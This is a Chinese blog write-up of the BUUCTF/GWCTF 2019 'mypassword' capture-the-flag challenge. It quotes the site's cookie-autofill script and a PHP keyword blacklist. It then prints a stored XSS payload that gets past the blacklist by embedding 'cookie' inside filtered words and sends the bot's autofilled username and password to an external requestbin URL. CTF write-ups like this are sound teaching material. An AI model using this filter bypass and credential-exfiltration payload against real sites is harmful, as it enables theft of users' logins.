[BUUCTF][GWCTF 2019]mypassword

本文主要是介绍[BUUCTF][GWCTF 2019]mypassword，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

首先从登陆界面看到了提示

发现了一串js代码，这段话是什么意思很easy了

if (document.cookie && document.cookie != '') {var cookies = document.cookie.split('; ');var cookie = {};for (var i = 0; i < cookies.length; i++) {var arr = cookies[i].split('=');var key = arr[0];cookie[key] = arr[1];}if(typeof(cookie['user']) != "undefined" && typeof(cookie['psw']) != "undefined"){document.getElementsByName("username")[0].value = cookie['user'];document.getElementsByName("password")[0].value = cookie['psw'];}
}

代码会把cookie中的username和password填进当前表单
，然后注册一个用户后，发现feedback页面，里面可以执行

<!-- if(is_array($feedback)){echo "<script>alert('反馈不合法');</script>";return false;}$blacklist = ['_','\'','&','\\','#','%','input','script','iframe','host','onload','onerror','srcdoc','location','svg','form','img','src','getElement','document','cookie'];foreach ($blacklist as $val) {while(true){if(stripos($feedback,$val) !== false){$feedback = str_ireplace($val,"",$feedback);}else{break;}}}-->

从这里提示不难看出来，其实是后端执行js，所以构造js，这里利用http://http.requestbin.buuoj.cn/buu提供的平台

<inpcookieut type="text" name="username"></inpcookieut>
<inpcookieut type="text" name="password"></inpcookieut>
<scricookiept scookierc="./js/login.js"></scricookiept>
<scricookiept>var uname = documcookieent.getElemcookieentsByName("username")[0].value;var passwd = documcookieent.getElemcookieentsByName("password")[0].value;var res = uname + " " + passwd;documcookieent.locacookietion="http://http.requestbin.buuoj.cn/*/?a="+res;
</scricookiept>

然后，等待flag到来啦

这篇关于[BUUCTF][GWCTF 2019]mypassword的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---